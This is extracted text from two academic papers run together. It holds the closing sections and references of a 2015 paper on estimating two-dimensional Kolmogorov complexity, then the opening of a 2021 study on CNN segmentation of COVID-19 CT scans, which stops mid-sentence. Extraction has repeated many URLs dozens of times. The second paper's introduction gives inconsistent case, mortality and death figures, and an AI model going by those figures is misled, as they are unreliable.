al. (2013) and Soler-Toscano & Zenil (2015). Zenil et al. (2015), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.23 27/31 https://peerj.com/computer-science/ http://dx.doi.org/10.7717/peerj-cs.23 CONCLUSIONS We have shown how a highly symmetric but algorithmic process is capable of generating a full range of patterns of different structural complexity. We have introduced this technique as a natural and objective measure of complexity for n-dimensional objects. With two different experiments we have demonstrated that the measure is compatible with lossless compression estimations of Kolmogorov complexity, yielding similar results but providing an alternative particularly for short strings. We have also shown that Km,2D (and Km) are ready for applications, and that calculating Universal Distributions is a stable alternative to compression and a potential useful tool for approximating the Kolmogorov complexity of objects, strings and images (arrays). We think this method will prove to do the same for a wide range of areas where compression is not an option given the size of strings involved. We also introduced the Block Decomposition Method. As we have seen with anomalies in the classification such as ECA Rule 77 (see Fig. 10), when approaching the complexity of the space–time diagrams of ECA by splitting them in square arrays of size 3, the Coding theorem method does have its limitations, especially because it is computationally very expensive (although the most expensive part needs to be done only once—that is, producing an approximation of the Universal Distribution). Like other high precision instruments for examining the tiniest objects in our world, measuring the smallest complexities is very expensive, just as the compression method can also be very expensive for large amounts of data. We have shown that the method is stable in the face of the changes in Turing machine formalism that we have undertaken (in this case Turmites) as compared to, for example, traditional 1-dimensional Turing machines or to strict integer value program-size com- plexity (Soler-Toscano et al., 2013) as a way to estimate the error of the numerical estima- tions of Kolmogorov complexity through algorithmic probability. For the Turing machine model we have now changed the number of states, the number of symbols and now even the movement of the head and its support (grid versus tape). We have shown and reported here and in Soler-Toscano et al. (2014) and Soler-Toscano et al. (2013) that all these changes yield distributions that are strongly correlated with each other up to the point to assert that all these parameters have marginal impact in the final distributions suggesting a fast rate of convergence in values that reduce the concern of the constant involved in the invariance theorem. In Zenil & Delahaye (2010) we also proposed a way to compare approximations to the Universal Distribution by completely different computational models (e.g., Post tag systems and cellular automata), showing that for the studied cases reasonable estimations with different degrees of correlations were produced. The fact that we classify Elementary Cellular Automata (ECA) as shown in this paper, with the output distribution of Turmites with results that fully agree with lossless compressibility, can be seen as evidence of agree- ment in the face of a radical change of computational model that preserves the apparent order and randomness of Turmites in ECA and of ECA in Turmites, which in turn are in full agreement with 1-dimensional Turing machines and with lossless compressibility. We have made available to the community this “microscope” to look at the space of bit strings and other objects in the form of the Online Algorithmic Complexity Calculator Zenil et al. (2015), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.23 28/31 https://peerj.com/computer-science/ http://dx.doi.org/10.7717/peerj-cs.23 (http://www.complexitycalculator.com) implementing Km (in the future it will also implement Km,2D and many other objects and a wider range of methods) that provides objective algorithmic probability and Kolmogorov complexity estimations for short binary strings using the method described herein. Raw data and the computer programs to reproduce the results for this paper can also be found under the Publications section of the Algorithmic Nature Group (http://www.algorithmicnature.org). ADDITIONAL INFORMATION AND DECLARATIONS Funding The Foundational Questions Institute (FQXi) (FQXi-MGA-1316) provided support (HZ). The funders had no role in study design, data collection and analysis, decision to publish, or preparation of the manuscript. Grant Disclosures The following grant information was disclosed by the authors: Foundational Questions Institute (FQXi): FQXi-MGA-1316. Competing Interests The authors declare there are no competing interests. Author Contributions • Hector Zenil conceived and designed the experiments, performed the experiments, analyzed the data, contributed reagents/materials/analysis tools, wrote the paper, prepared figures and/or tables, performed the computation work, reviewed drafts of the paper. • Fernando Soler-Toscano conceived and designed the experiments, performed the experiments, analyzed the data, wrote the paper, prepared figures and/or tables, performed the computation work, reviewed drafts of the paper. • Jean-Paul Delahaye conceived and designed the experiments, contributed reagents/materials/analysis tools, reviewed drafts of the paper. • Nicolas Gauvrit analyzed the data, contributed reagents/materials/analysis tools, wrote the paper, prepared figures and/or tables, reviewed drafts of the paper. Supplemental Information Supplemental information for this article can be found online at http://dx.doi.org/ 10.7717/peerj-cs.23#supplemental-information. REFERENCES Andrienko YuA, Brilliantov NV, Kurths J. 2000. Complexity of two-dimensional patterns. The European Physical Journal B—Condensed Matter and Complex Systems 15:539–546 DOI 10.1007/s100510051157. Calude CS. 2002. Information and randomness. 1st edition. Heidelberg: Springer. Zenil et al. (2015), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.23 29/31 https://peerj.com/computer-science/ http://www.complexitycalculator.com http://www.complexitycalculator.com http://www.complexitycalculator.com http://www.complexitycalculator.com http://www.complexitycalculator.com http://www.complexitycalculator.com http://www.complexitycalculator.com http://www.complexitycalculator.com http://www.complexitycalculator.com http://www.complexitycalculator.com http://www.complexitycalculator.com http://www.complexitycalculator.com http://www.complexitycalculator.com http://www.complexitycalculator.com http://www.complexitycalculator.com http://www.complexitycalculator.com http://www.complexitycalculator.com http://www.complexitycalculator.com http://www.complexitycalculator.com http://www.complexitycalculator.com http://www.complexitycalculator.com http://www.complexitycalculator.com http://www.complexitycalculator.com http://www.complexitycalculator.com http://www.complexitycalculator.com http://www.complexitycalculator.com http://www.complexitycalculator.com http://www.complexitycalculator.com http://www.complexitycalculator.com http://www.complexitycalculator.com http://www.complexitycalculator.com http://www.complexitycalculator.com http://www.complexitycalculator.com http://www.complexitycalculator.com http://www.complexitycalculator.com http://www.algorithmicnature.org http://www.algorithmicnature.org http://www.algorithmicnature.org http://www.algorithmicnature.org http://www.algorithmicnature.org http://www.algorithmicnature.org http://www.algorithmicnature.org http://www.algorithmicnature.org http://www.algorithmicnature.org http://www.algorithmicnature.org http://www.algorithmicnature.org http://www.algorithmicnature.org http://www.algorithmicnature.org http://www.algorithmicnature.org http://www.algorithmicnature.org http://www.algorithmicnature.org http://www.algorithmicnature.org http://www.algorithmicnature.org http://www.algorithmicnature.org http://www.algorithmicnature.org http://www.algorithmicnature.org http://www.algorithmicnature.org http://www.algorithmicnature.org http://www.algorithmicnature.org http://www.algorithmicnature.org http://www.algorithmicnature.org http://www.algorithmicnature.org http://www.algorithmicnature.org http://www.algorithmicnature.org http://www.algorithmicnature.org http://www.algorithmicnature.org http://www.algorithmicnature.org http://dx.doi.org/10.7717/peerj-cs.23#supplemental-information http://dx.doi.org/10.7717/peerj-cs.23#supplemental-information http://dx.doi.org/10.7717/peerj-cs.23#supplemental-information http://dx.doi.org/10.7717/peerj-cs.23#supplemental-information http://dx.doi.org/10.7717/peerj-cs.23#supplemental-information http://dx.doi.org/10.7717/peerj-cs.23#supplemental-information http://dx.doi.org/10.7717/peerj-cs.23#supplemental-information http://dx.doi.org/10.7717/peerj-cs.23#supplemental-information http://dx.doi.org/10.7717/peerj-cs.23#supplemental-information http://dx.doi.org/10.7717/peerj-cs.23#supplemental-information http://dx.doi.org/10.7717/peerj-cs.23#supplemental-information http://dx.doi.org/10.7717/peerj-cs.23#supplemental-information http://dx.doi.org/10.7717/peerj-cs.23#supplemental-information http://dx.doi.org/10.7717/peerj-cs.23#supplemental-information http://dx.doi.org/10.7717/peerj-cs.23#supplemental-information http://dx.doi.org/10.7717/peerj-cs.23#supplemental-information http://dx.doi.org/10.7717/peerj-cs.23#supplemental-information http://dx.doi.org/10.7717/peerj-cs.23#supplemental-information http://dx.doi.org/10.7717/peerj-cs.23#supplemental-information http://dx.doi.org/10.7717/peerj-cs.23#supplemental-information http://dx.doi.org/10.7717/peerj-cs.23#supplemental-information http://dx.doi.org/10.7717/peerj-cs.23#supplemental-information http://dx.doi.org/10.7717/peerj-cs.23#supplemental-information http://dx.doi.org/10.7717/peerj-cs.23#supplemental-information http://dx.doi.org/10.7717/peerj-cs.23#supplemental-information http://dx.doi.org/10.7717/peerj-cs.23#supplemental-information http://dx.doi.org/10.7717/peerj-cs.23#supplemental-information http://dx.doi.org/10.7717/peerj-cs.23#supplemental-information http://dx.doi.org/10.7717/peerj-cs.23#supplemental-information http://dx.doi.org/10.7717/peerj-cs.23#supplemental-information http://dx.doi.org/10.7717/peerj-cs.23#supplemental-information http://dx.doi.org/10.7717/peerj-cs.23#supplemental-information http://dx.doi.org/10.7717/peerj-cs.23#supplemental-information http://dx.doi.org/10.7717/peerj-cs.23#supplemental-information http://dx.doi.org/10.7717/peerj-cs.23#supplemental-information http://dx.doi.org/10.7717/peerj-cs.23#supplemental-information http://dx.doi.org/10.7717/peerj-cs.23#supplemental-information http://dx.doi.org/10.7717/peerj-cs.23#supplemental-information http://dx.doi.org/10.7717/peerj-cs.23#supplemental-information http://dx.doi.org/10.7717/peerj-cs.23#supplemental-information http://dx.doi.org/10.7717/peerj-cs.23#supplemental-information http://dx.doi.org/10.7717/peerj-cs.23#supplemental-information http://dx.doi.org/10.7717/peerj-cs.23#supplemental-information http://dx.doi.org/10.7717/peerj-cs.23#supplemental-information http://dx.doi.org/10.1007/s100510051157 http://dx.doi.org/10.7717/peerj-cs.23 Casali AG, Gosseries O, Rosanova M, Boly M, Sarasso S, Casali KR, Casarotto S, Bruno M, Laureys S, Tononi G, Massimini M. 2013. A theoretically based index of consciousness independent of sensory processing and behavior. Science Translational Medicine 5(198):198ra105 DOI 10.1126/scitranslmed.3006294. Chaitin GJ. 1969. On the length of programs for computing finite binary sequences: statistical considerations. Journal of the ACM 16(1):145–159 DOI 10.1145/321495.321506. Chekaf M, Gauvrit N, Guida A, Mathy F. 2015. Chunking in working memory and its relationship to intelligence. In: Proceedings of the 37th annual meeting of the cognitive science society, Pasadena, California. Cilibrasi R, Vitanyi P. 2005. Clustering by compression. IEEE Transactions on Information Theory 51(4):1523–1545 DOI 10.1109/TIT.2005.844059. Cook M. 2004. Universality in Elementary Cellular Automata. Complex Systems 15:1–40. Cover TM, Thomas JA. 2006. Information theory. 2nd edition. New Jersey: J. Wiley and Sons. Delahaye J-P, Zenil H. 2007a. Towards a stable definition of Kolmogorov–Chaitin complexity. ArXiv preprint. arXiv:0804.3459. Delahaye J-P, Zenil H. 2007b. On the Kolmogorov–Chaitin complexity for short sequences. In: Calude C, ed. Randomness and complexity: from Leibniz to Chaitin. Singapore: World Scientific. Delahaye J-P, Zenil H. 2012. Numerical evaluation of the complexity of short strings: a glance into the innermost structure of algorithmic randomness. Applied Mathematics and Computation 219:63–77 DOI 10.1016/j.amc.2011.10.006. Dieguez S, Wagner-Egger P, Gauvrit N. 2015. “Nothing happens by accident”, or does it? A low prior for randomness does not explain belief in conspiracy theories. Psychological Science DOI 10.1177/0956797615598740. Feldman DP. 2008. Some foundations in complex systems: entropy, information, computation, and complexity. Beijing: Santa Fe Institute’s annual Complex Systems Summer School. Feldman DP, Crutchfield JP. 2003. Structural information in two-dimensional patterns: entropy convergence and excess entropy. Physical Review E 67:051104 DOI 10.1103/Phys- RevE.67.051104. Gardner M. 1970. Mathematical games—the fantastic combinations of John Conway’s new solitaire game “life”. Scientific American 223:120–123 DOI 10.1038/scientificamerican1070-120. Gauvrit N, Soler-Toscano F, Zenil H. 2014. Natural scene statistics mediate the perception of image complexity. Visual Cognition 22(8):1084–1091 DOI 10.1080/13506285.2014.950365. Hutter M. 2003. On the existence and convergence of computable universal priors. In: Proc. 14th internat. conf. on algorithmic learning theory (ALT-2003), Lecture notes on artificial intelligence, vol. 2842. Berlin: Sapporo, Springer, 298–312. Joosten J. 2012. Turing machine enumeration: NKS versus lexicographical. Wol- fram demonstrations project. Available at http://demonstrations.wolfram.com/ TuringMachineEnumerationNKSVersusLexicographical/. Kempe V, Gauvrit N, Forsyth D. 2015. Structure emerges faster during cultural transmission in children than in adults. Cognition 136:247–254 DOI 10.1016/j.cognition.2014.11.038. Kircher W, Li M, Vitanyi P. 1997. The miraculous universal distribution. The Mathematical Intelligencer 19(4):7–15 DOI 10.1007/BF03024407. Kolmogorov AN. 1965. Three approaches to the quantitative definition of information. Problems of Information and Transmission 1(1):1–7. Zenil et al. (2015), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.23 30/31 https://peerj.com/computer-science/ http://dx.doi.org/10.1126/scitranslmed.3006294 http://dx.doi.org/10.1145/321495.321506 http://dx.doi.org/10.1109/TIT.2005.844059 http://arxiv.org/abs/0804.3459 http://dx.doi.org/10.1016/j.amc.2011.10.006 http://dx.doi.org/10.1177/0956797615598740 http://dx.doi.org/10.1103/PhysRevE.67.051104 http://dx.doi.org/10.1103/PhysRevE.67.051104 http://dx.doi.org/10.1038/scientificamerican1070-120 http://dx.doi.org/10.1080/13506285.2014.950365 http://demonstrations.wolfram.com/TuringMachineEnumerationNKSVersusLexicographical/ http://demonstrations.wolfram.com/TuringMachineEnumerationNKSVersusLexicographical/ http://demonstrations.wolfram.com/TuringMachineEnumerationNKSVersusLexicographical/ http://demonstrations.wolfram.com/TuringMachineEnumerationNKSVersusLexicographical/ http://demonstrations.wolfram.com/TuringMachineEnumerationNKSVersusLexicographical/ http://demonstrations.wolfram.com/TuringMachineEnumerationNKSVersusLexicographical/ http://demonstrations.wolfram.com/TuringMachineEnumerationNKSVersusLexicographical/ http://demonstrations.wolfram.com/TuringMachineEnumerationNKSVersusLexicographical/ http://demonstrations.wolfram.com/TuringMachineEnumerationNKSVersusLexicographical/ http://demonstrations.wolfram.com/TuringMachineEnumerationNKSVersusLexicographical/ http://demonstrations.wolfram.com/TuringMachineEnumerationNKSVersusLexicographical/ http://demonstrations.wolfram.com/TuringMachineEnumerationNKSVersusLexicographical/ http://demonstrations.wolfram.com/TuringMachineEnumerationNKSVersusLexicographical/ http://demonstrations.wolfram.com/TuringMachineEnumerationNKSVersusLexicographical/ http://demonstrations.wolfram.com/TuringMachineEnumerationNKSVersusLexicographical/ http://demonstrations.wolfram.com/TuringMachineEnumerationNKSVersusLexicographical/ http://demonstrations.wolfram.com/TuringMachineEnumerationNKSVersusLexicographical/ http://demonstrations.wolfram.com/TuringMachineEnumerationNKSVersusLexicographical/ http://demonstrations.wolfram.com/TuringMachineEnumerationNKSVersusLexicographical/ http://demonstrations.wolfram.com/TuringMachineEnumerationNKSVersusLexicographical/ http://demonstrations.wolfram.com/TuringMachineEnumerationNKSVersusLexicographical/ http://demonstrations.wolfram.com/TuringMachineEnumerationNKSVersusLexicographical/ http://demonstrations.wolfram.com/TuringMachineEnumerationNKSVersusLexicographical/ http://demonstrations.wolfram.com/TuringMachineEnumerationNKSVersusLexicographical/ http://demonstrations.wolfram.com/TuringMachineEnumerationNKSVersusLexicographical/ http://demonstrations.wolfram.com/TuringMachineEnumerationNKSVersusLexicographical/ http://demonstrations.wolfram.com/TuringMachineEnumerationNKSVersusLexicographical/ http://demonstrations.wolfram.com/TuringMachineEnumerationNKSVersusLexicographical/ http://demonstrations.wolfram.com/TuringMachineEnumerationNKSVersusLexicographical/ http://demonstrations.wolfram.com/TuringMachineEnumerationNKSVersusLexicographical/ http://demonstrations.wolfram.com/TuringMachineEnumerationNKSVersusLexicographical/ http://demonstrations.wolfram.com/TuringMachineEnumerationNKSVersusLexicographical/ http://demonstrations.wolfram.com/TuringMachineEnumerationNKSVersusLexicographical/ http://demonstrations.wolfram.com/TuringMachineEnumerationNKSVersusLexicographical/ http://demonstrations.wolfram.com/TuringMachineEnumerationNKSVersusLexicographical/ http://demonstrations.wolfram.com/TuringMachineEnumerationNKSVersusLexicographical/ http://demonstrations.wolfram.com/TuringMachineEnumerationNKSVersusLexicographical/ http://demonstrations.wolfram.com/TuringMachineEnumerationNKSVersusLexicographical/ http://demonstrations.wolfram.com/TuringMachineEnumerationNKSVersusLexicographical/ http://demonstrations.wolfram.com/TuringMachineEnumerationNKSVersusLexicographical/ http://demonstrations.wolfram.com/TuringMachineEnumerationNKSVersusLexicographical/ http://demonstrations.wolfram.com/TuringMachineEnumerationNKSVersusLexicographical/ http://demonstrations.wolfram.com/TuringMachineEnumerationNKSVersusLexicographical/ http://demonstrations.wolfram.com/TuringMachineEnumerationNKSVersusLexicographical/ http://demonstrations.wolfram.com/TuringMachineEnumerationNKSVersusLexicographical/ http://demonstrations.wolfram.com/TuringMachineEnumerationNKSVersusLexicographical/ http://demonstrations.wolfram.com/TuringMachineEnumerationNKSVersusLexicographical/ http://demonstrations.wolfram.com/TuringMachineEnumerationNKSVersusLexicographical/ http://demonstrations.wolfram.com/TuringMachineEnumerationNKSVersusLexicographical/ http://demonstrations.wolfram.com/TuringMachineEnumerationNKSVersusLexicographical/ http://demonstrations.wolfram.com/TuringMachineEnumerationNKSVersusLexicographical/ http://demonstrations.wolfram.com/TuringMachineEnumerationNKSVersusLexicographical/ http://demonstrations.wolfram.com/TuringMachineEnumerationNKSVersusLexicographical/ http://demonstrations.wolfram.com/TuringMachineEnumerationNKSVersusLexicographical/ http://demonstrations.wolfram.com/TuringMachineEnumerationNKSVersusLexicographical/ http://demonstrations.wolfram.com/TuringMachineEnumerationNKSVersusLexicographical/ http://demonstrations.wolfram.com/TuringMachineEnumerationNKSVersusLexicographical/ http://demonstrations.wolfram.com/TuringMachineEnumerationNKSVersusLexicographical/ http://demonstrations.wolfram.com/TuringMachineEnumerationNKSVersusLexicographical/ http://demonstrations.wolfram.com/TuringMachineEnumerationNKSVersusLexicographical/ http://demonstrations.wolfram.com/TuringMachineEnumerationNKSVersusLexicographical/ http://demonstrations.wolfram.com/TuringMachineEnumerationNKSVersusLexicographical/ http://demonstrations.wolfram.com/TuringMachineEnumerationNKSVersusLexicographical/ http://demonstrations.wolfram.com/TuringMachineEnumerationNKSVersusLexicographical/ http://demonstrations.wolfram.com/TuringMachineEnumerationNKSVersusLexicographical/ http://demonstrations.wolfram.com/TuringMachineEnumerationNKSVersusLexicographical/ http://demonstrations.wolfram.com/TuringMachineEnumerationNKSVersusLexicographical/ http://demonstrations.wolfram.com/TuringMachineEnumerationNKSVersusLexicographical/ http://demonstrations.wolfram.com/TuringMachineEnumerationNKSVersusLexicographical/ http://demonstrations.wolfram.com/TuringMachineEnumerationNKSVersusLexicographical/ http://demonstrations.wolfram.com/TuringMachineEnumerationNKSVersusLexicographical/ http://demonstrations.wolfram.com/TuringMachineEnumerationNKSVersusLexicographical/ http://demonstrations.wolfram.com/TuringMachineEnumerationNKSVersusLexicographical/ http://demonstrations.wolfram.com/TuringMachineEnumerationNKSVersusLexicographical/ http://demonstrations.wolfram.com/TuringMachineEnumerationNKSVersusLexicographical/ http://demonstrations.wolfram.com/TuringMachineEnumerationNKSVersusLexicographical/ http://demonstrations.wolfram.com/TuringMachineEnumerationNKSVersusLexicographical/ http://demonstrations.wolfram.com/TuringMachineEnumerationNKSVersusLexicographical/ http://demonstrations.wolfram.com/TuringMachineEnumerationNKSVersusLexicographical/ http://demonstrations.wolfram.com/TuringMachineEnumerationNKSVersusLexicographical/ http://demonstrations.wolfram.com/TuringMachineEnumerationNKSVersusLexicographical/ http://demonstrations.wolfram.com/TuringMachineEnumerationNKSVersusLexicographical/ http://demonstrations.wolfram.com/TuringMachineEnumerationNKSVersusLexicographical/ http://dx.doi.org/10.1016/j.cognition.2014.11.038 http://dx.doi.org/10.1007/BF03024407 http://dx.doi.org/10.7717/peerj-cs.23 Langton CG. 1986. Studying artificial life with cellular automata. Physica D: Nonlinear Phenomena 22(1–3):120–149 DOI 10.1016/0167-2789(86)90237-X. Levin L. 1974. Laws of information conservation (non-growth) and aspects of the foundation of probability theory. Problems of Information and Transmission 10:206–210. Li M, Vitányi P. 2009. An introduction to Kolmogorov complexity and its applications. 3rd edition. Heildelberg: Springer. Pegg Jr Ed. 2003. Math Puzzle. Available at http://www.mathpuzzle.com/26Mar03.html (accessed 10 June 2013). Radó T. 1962. On non-computable functions. Bell System Technical Journal 41(3):877–884 DOI 10.1002/j.1538-7305.1962.tb00480.x. Rivals É, Dauchet M, Delahaye J-P, Delgrange O. 1996. Compression and genetic sequence analysis. Biochimie 78:315–322 DOI 10.1016/0300-9084(96)84763-8. Shalizi CR, Shalizi KL, Haslinger R. 2004. Quantifying self-organization with optimal predictors. Physical Review Letters 93:118701 DOI 10.1103/PhysRevLett.93.118701. Soler-Toscano F, Zenil H. 2015. A computable measure of algorithmic probability by finite approximations. ArXiv preprint. arXiv:1504.06240. Soler-Toscano F, Zenil H, Delahaye J-P, Gauvrit N. 2013. Correspondence and independence of numerical evaluations of algorithmic information measures. Computability 2(2):125–140. Soler-Toscano F, Zenil H, Delahaye J-P, Gauvrit N. 2014. Calculating Kolmogorov complexity from the frequency output distributions of small turing machines. PLoS ONE 9(5):e96223 DOI 10.1371/journal.pone.0096223. Solomonoff RJ. 1964. A formal theory of inductive inference: parts 1 and 2. Information and Control 7:1–22; 224–254 DOI 10.1016/S0019-9958(64)90223-2. Wolfram S. 2002. A new kind of science. Champaign: Wolfram Media. Young K, Du A-T, Kramer J, Rosen H, Miller B, Weiner M, Schuff N. 2009. Patterns of structural complexity in alzheimer’s disease and frontotemporal dementia. Human Brain Mapping 30(5):1667–1677 DOI 10.1002/hbm.20632. Young K, Schuff N. 2008. Measuring structural complexity in brain images. NeuroImage 39(4):1721–1730 DOI 10.1016/j.neuroimage.2007.10.043. Zenil H. 2010. Compression-based investigation of the dynamical properties of cellular automata and other systems. Complex Systems 19(1):1–28. Zenil H. 2011. Une approche expérimentale à la théorie algorithmique de la complexité, dissertation in fulfilment of the degree of Doctor in Computer Science, Université de Lille 1. Zenil H, Delahaye J-P. 2010. On the algorithmic nature of the world. In: Dodig-Crnkovic G, Burgin M, eds. Information and computation. Singapore: World Scientific Publishing Company. Zenil H, Kiani N, Tegnér J. A probabilistic algorithmic information approach to quantify loss of information of network-based dimensionality reduction techniques. Journal of Complex Networks In press. Zenil H, Soler-Toscano F, Dingle K, Louis A. 2014. Correlation of automorphism group size and topological properties with program-size complexity evaluations of graphs and complex networks. Physica A: Statistical Mechanics and its Applications 404:341–358 DOI 10.1016/j.physa.2014.02.060. Zenil et al. (2015), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.23 31/31 https://peerj.com/computer-science/ http://dx.doi.org/10.1016/0167-2789(86)90237-X http://www.mathpuzzle.com/26Mar03.html http://www.mathpuzzle.com/26Mar03.html http://www.mathpuzzle.com/26Mar03.html http://www.mathpuzzle.com/26Mar03.html http://www.mathpuzzle.com/26Mar03.html http://www.mathpuzzle.com/26Mar03.html http://www.mathpuzzle.com/26Mar03.html http://www.mathpuzzle.com/26Mar03.html http://www.mathpuzzle.com/26Mar03.html http://www.mathpuzzle.com/26Mar03.html http://www.mathpuzzle.com/26Mar03.html http://www.mathpuzzle.com/26Mar03.html http://www.mathpuzzle.com/26Mar03.html http://www.mathpuzzle.com/26Mar03.html http://www.mathpuzzle.com/26Mar03.html http://www.mathpuzzle.com/26Mar03.html http://www.mathpuzzle.com/26Mar03.html http://www.mathpuzzle.com/26Mar03.html http://www.mathpuzzle.com/26Mar03.html http://www.mathpuzzle.com/26Mar03.html http://www.mathpuzzle.com/26Mar03.html http://www.mathpuzzle.com/26Mar03.html http://www.mathpuzzle.com/26Mar03.html http://www.mathpuzzle.com/26Mar03.html http://www.mathpuzzle.com/26Mar03.html http://www.mathpuzzle.com/26Mar03.html http://www.mathpuzzle.com/26Mar03.html http://www.mathpuzzle.com/26Mar03.html http://www.mathpuzzle.com/26Mar03.html http://www.mathpuzzle.com/26Mar03.html http://www.mathpuzzle.com/26Mar03.html http://www.mathpuzzle.com/26Mar03.html http://www.mathpuzzle.com/26Mar03.html http://www.mathpuzzle.com/26Mar03.html http://www.mathpuzzle.com/26Mar03.html http://www.mathpuzzle.com/26Mar03.html http://www.mathpuzzle.com/26Mar03.html http://www.mathpuzzle.com/26Mar03.html http://dx.doi.org/10.1002/j.1538-7305.1962.tb00480.x http://dx.doi.org/10.1016/0300-9084(96)84763-8 http://dx.doi.org/10.1103/PhysRevLett.93.118701 http://arxiv.org/abs/1504.06240 http://dx.doi.org/10.1371/journal.pone.0096223 http://dx.doi.org/10.1016/S0019-9958(64)90223-2 http://dx.doi.org/10.1002/hbm.20632 http://dx.doi.org/10.1016/j.neuroimage.2007.10.043 http://dx.doi.org/10.1016/j.physa.2014.02.060 http://dx.doi.org/10.7717/peerj-cs.23 Two-dimensional Kolmogorov complexity and an empirical validation of the Coding theorem method by compressibility Introduction Kolmogorov--Chaitin complexity Uncomputability and instability of K Solomonoff--Levin Algorithmic Probability The Coding Theorem method Deterministic 2-dimensional Turing machines (Turmites) An Approximation to the Universal Distribution Setting the runtime Output analysis Evaluating 2-dimensional Kolmogorov complexity Validation of the Coding Theorem Method by compressibility Comparison of Km and approaches based on compression Comparison of Km and compression of cellular automata Km, 2D comparison with compressed ECA evolutions Robustness of the approximations to m(s) Real-world evidence Conclusions References work_z6dwctmg7zd2tjpjeloj4o25mm ---- Performance analysis of lightweight CNN models to segment infectious lung tissues of COVID-19 cases from tomographic images Performance analysis of lightweight CNN models to segment infectious lung tissues of COVID-19 cases from tomographic images Tharun J. Iyer1, Alex Noel Joseph Raj2, Sushil Ghildiyal1 and Ruban Nersisson1 1 School of Electrical Engineering, Vellore Institute of Technology, Vellore, Tamil Nadu, India 2 Department of Electronic Engineering, Shantou University, Shantou, Guangdong, China ABSTRACT The pandemic of Coronavirus Disease-19 (COVID-19) has spread around the world, causing an existential health crisis. Automated detection of COVID-19 infections in the lungs from Computed Tomography (CT) images offers huge potential in tackling the problem of slow detection and augments the conventional diagnostic procedures. However, segmenting COVID-19 from CT Scans is problematic, due to high variations in the types of infections and low contrast between healthy and infected tissues. While segmenting Lung CT Scans for COVID-19, fast and accurate results are required and furthermore, due to the pandemic, most of the research community has opted for various cloud based servers such as Google Colab, etc. to develop their algorithms. High accuracy can be achieved using Deep Networks but the prediction time would vary as the resources are shared amongst many thus requiring the need to compare different lightweight segmentation model. To address this issue, we aim to analyze the segmentation of COVID-19 using four Convolutional Neural Networks (CNN). The images in our dataset are preprocessed where the motion artifacts are removed. The four networks are UNet, Segmentation Network (Seg Net), High-Resolution Network (HR Net) and VGG UNet. Trained on our dataset of more than 3,000 images, HR Net was found to be the best performing network achieving an accuracy of 96.24% and a Dice score of 0.9127. The analysis shows that lightweight CNN models perform better than other neural net models when to segment infectious tissue due to COVID-19 from CT slices. Subjects Algorithms and Analysis of Algorithms, Artificial Intelligence, Emerging Technologies Keywords Convolutional neural networks, Computed tomography, COVID-19, Segmentation, High-Resolution Network (HR Net), Segmentation Network (Seg Net), UNet, VGG-UNet INTRODUCTION During the winter months December 2019, a highly contagious disease out broke in Wuhan, China (Zhu et al., 2020; Liu et al., 2020). High grade fever and other flu like symptoms were noticed, and most of the patients developed pneumonia. The pathogen causing the disease was identified as corona virus, and named as Severe Acute Respiratory How to cite this article Iyer TJ, Joseph Raj AN, Ghildiyal S, Nersisson R. 2021. Performance analysis of lightweight CNN models to segment infectious lung tissues of COVID-19 cases from tomographic images. PeerJ Comput. Sci. 7:e368 DOI 10.7717/peerj-cs.368 Submitted 3 November 2020 Accepted 3 January 2021 Published 22 February 2021 Corresponding author Ruban Nersisson, nruban@vit.ac.in Academic editor Marcin Woźniak Additional Information and Declarations can be found on page 18 DOI 10.7717/peerj-cs.368 Copyright 2021 Iyer et al. Distributed under Creative Commons CC-BY 4.0 http://dx.doi.org/10.7717/peerj-cs.368 mailto:nruban@�vit.�ac.�in https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/10.7717/peerj-cs.368 http://www.creativecommons.org/licenses/by/4.0/ http://www.creativecommons.org/licenses/by/4.0/ https://peerj.com/computer-science/ Syndrome Corona Virus-2 (SARS-CoV-2) (World Health Organization, 2020). The disease caused by the virus is named by World health Organization (WHO) as Corona Virus Disease (COVID-19). WHO also declared COVID 19 spread as Global public health emergency (World Health Organization, 2020). As of 9th May 2020, more than 200 countries around the world are affected by COVID-19. There are around 4 million people affected by the disease worldwide with a mortality rate of 6% (around 2.75 million people lost their lives). Developed countries like US, Europe and most of the developing countries are suffering a lot from the outbreak. The scientific community is largely involved in devising an antidrug and vaccines for the device. But unfortunately there are no positive results till date and more over it is reported that, due to mutations, characteristics are changing which makes the vaccine development even more challenging. Taking the situation into account, there are very few ways we can control the virus; like staying isolated from the world and breaking the spreading chain of the virus, maintaining the personal hygiene, early detection of the symptoms and taking necessary precautions are few of them. The successful control of the outbreak depends on the rapid and accurate detection and identification of the symptoms isolating the patient from the community, so that the spread of the disease can be stopped. Currently, the method used for the detection is Real-time reverse transcriptase polymerase chain reaction (RT-PCR) (Li & Xia, 2020). It is the standard procedure used by many hospitals and clinics for testing COVID-19 cases. Even though this method remains the reference standard, there are many reported false negative cases using this RT-PCR (Chan et al., 2020), which is an alarming fact on the situation. It is also time consuming and the limited supply of RT-PCR kits for the rural areas make the testing more difficult (Chen, Yao & Zhang, 2020). Since the COVID-19 patients develop breathe related discomfort and Pneumonia as the outcome of the disease progress, Radiological studies can play a vital role in diagnosing the lung infections caused by this episode (Zu et al., 2020). The CT chest scan can be used to identify the early stages of lung infections and related problems. The chest CT reveals the initial pulmonary abnormalities for COVID-19 patients for whom RT-PCR gave negative results (Ai et al., 2020). Also, to accurately and efficiently control the virus, studies have been conducted to implement forecasting models to predict the spread of COVID-19 (Wieczorek, Siłka & Woźniak, 2020). Due to the nature of the problem being a regression problem to forecast the spread and predict how the virus may spread, Artificial Neural Networks (ANNs) and Recurrent Neural Networks (RNNs) were used to model the data. Data was collected from the center for Systems Science and Engineering (CSSE) at Johns Hopkins University. To further improve the accuracy of prediction and decrease the error rate, Deep Learning was widely used as a predictor and forecasting model. Generative Adversarial Networks (GANs), Extreme Learning Machine (ELM), and Long/Short Term Memory (LSTM) were some models used to predict the spread of the virus (Jamshidi et al., 2020). The performance of the Deep Learning differed significantly from the use of RNNs and ANNs. Therefore, we decided to use Deep Learning methods in our study to explore the performance of models on our data. To approach the solution of using Deep Learning Iyer et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.368 2/20 http://dx.doi.org/10.7717/peerj-cs.368 https://peerj.com/computer-science/ methods to segment lung CT scans, we looked at studies conducted on detecting small nodules or lung tissue using complex neural networks. Capizzi et al. (2019) used probabilistic neural networks and a Bio-Inspired Reinforcement Learning network based on fuzzy logic to accurately segment lung nodules. The network worked at 92.55% 